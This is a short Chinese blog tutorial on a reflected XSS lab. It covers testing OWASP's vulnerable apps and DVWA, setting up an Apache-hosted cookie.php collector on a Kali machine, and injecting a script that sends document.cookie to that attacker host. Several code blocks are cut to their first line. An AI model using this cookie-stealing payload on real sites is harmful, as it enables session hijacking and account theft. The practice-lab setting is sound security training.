反射型XSS攻击
反射型xss攻击,交互的数据一般不会被存储在数据库中,恶意脚本在请求中传入,服务器响应中返回,是一次性的
反射型XSS攻击
1.检查是否存在漏洞
打开owasp虚拟机,访问其主网址,点开糟糕的web应用程序
1 | // 弹出提示框 |
2.使用简单的脚本取走cookie值测试
1 | systemctl status apache2 # 查看apache服务状态 |
确认cookie读写的文件夹权限
需要保证cookie.txt文件所属文件夹的所有者和组是www-data,否则无法正常读写文件
apache的默认网站路径是/var/www/html,我们在这个目录下新建一个自己的目录
首先需要在root的权限进行操作
1 | sudo passwd root |
然后:
1 | mkdir /var/www/html/demo |
在cookie.php写入脚本
1 | <?php |
编写恶意代码跳转链接
1 | http://你的kali主机ip地址/demo/xss/cookie.php?cookie=a-cookie |
在dvwa(存在漏洞的网站)中嵌入代码
1 | <script>window.open('http://IP/demo/xss/cookie.php?cookie='+document.cookie)</script> |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Floating Dream!
评论